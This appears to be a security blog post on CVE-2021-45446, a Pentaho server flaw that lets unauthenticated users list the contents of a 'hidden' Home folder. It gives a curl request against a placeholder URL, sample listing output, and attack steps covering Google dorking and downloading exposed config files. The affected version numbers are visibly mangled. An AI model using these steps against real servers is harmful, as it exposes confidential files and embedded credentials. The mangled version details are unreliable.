In late 2021, a security flaw (CVE-2021-45446) was discovered in Hitachi Vantara Pentaho Business Analytics Server. This post dives into what makes this vulnerability dangerous, why it happens, and how attackers can exploit it. We’ll also look at how to check if your Pentaho server is vulnerable, with sample code and useful links along the way.
What Is CVE-2021-45446?
CVE-2021-45446 is a bug in Pentaho Business Analytics Server, affecting all versions before 9.2..2 and 8.3..25. The server lets admins mark folders as “hidden,” but due to this flaw, when you set the Home directory to hidden, its child folders and files may still be seen by users.
This is a classic case of a directory indexing vulnerability:
- The server allows users (even unauthorized) to access a list of files and subfolders under the Home directory.
- The intended “hidden” flag doesn’t “cascade,” or apply, to everything inside the Home folder.
The result? Attackers can get an index of every report, script, and file in the business analytics environment, increasing the risk of further attacks and sensitive data leaks.
How Does It Work?
When you use the Pentaho system, folders can have a hidden property set to keep contents private. In secure systems, making a parent folder hidden should hide all its children automatically (i.e., “cascading”). Pentaho did not do this — so while the Home folder itself becomes hidden, everything inside stays visible through directory listing features.
In short:
If an attacker visits a URL like https://<pentaho-server>/pentaho/kettle/Home/, he may see a full directory listing—unless an admin has manually hidden each sub-item.
Simple Exploit Example
To check if you are vulnerable, you can use a browser or command line tool to request the contents of the Home directory. No authentication may be needed if permissions are misconfigured.
Example URL
https://YOUR-PENTAHO-SERVER:PORT/pentaho/kettle/Home/
Here’s a curl snippet that simulates what an attacker might do
curl -k https://YOUR-PENTAHO-SERVER:PORT/pentaho/kettle/Home/
If the directory is listed (you see filenames, folders, etc.), your server is not protected. You’ll likely see something like this in the response:
<html>
<head><title>Index of /pentaho/kettle/Home/</title></head>
<body>
<h1>Index of /pentaho/kettle/Home/</h1>
<ul>
<li><a href="confidential-report.ktr">confidential-report.ktr</a></li>
<li><a href="scripts/">scripts/</a></li>
<!-- more items -->
</ul>
</body>
</html>
Or, in a more API-driven server, you might see a JSON list instead.
Attack Steps
1. Find the Pentaho server — via recon or Google dorking (e.g., inurl:/pentaho/).
2. Browse directories like /pentaho/kettle/Home/.
3. Collect listing information: Download config files, data transformations, or scripts not intended for public use.
Why Does This Matter?
- Exposed business logic: Revealed .ktr or .kjb files can have embedded passwords or database connections.
Data breaches: Attackers can download sensitive internal analytics, PII, or business reports.
- Attack chaining: The info can be used for privilege escalation, phishing, or launching other attacks.
Download patches or find upgrade instructions here
- Pentaho Support Portal
- Hitachi Security Advisory - CVE-2021-45446
Manually mark all subfolders and items as hidden.
- Use a firewall or reverse proxy to restrict access to /pentaho/kettle/Home/.
References
- Original CVE Entry - NVD
- Hitachi Security Advisory
- Exploit-DB - Pentaho Exposure
- Pentaho Documentation
- Pentaho Patch Downloads
Conclusion
CVE-2021-45446 is a subtle but dangerous oversight in how Pentaho manages “hidden” folders. If you use Pentaho in your enterprise or for analytics, patch now and check your public-facing URLs. A simple misconfiguration could help attackers map your environment and take the next step in a targeted attack.
*Stay safe! Patch early, and always test your public endpoints for leaks like this one.*
*This post is based on real-world research and exclusive analysis. For more on vulnerabilities and secure analytics, follow our updates or check out the references above!*
Timeline
Published on: 11/02/2022 15:15:00 UTC
Last modified on: 07/21/2023 16:52:00 UTC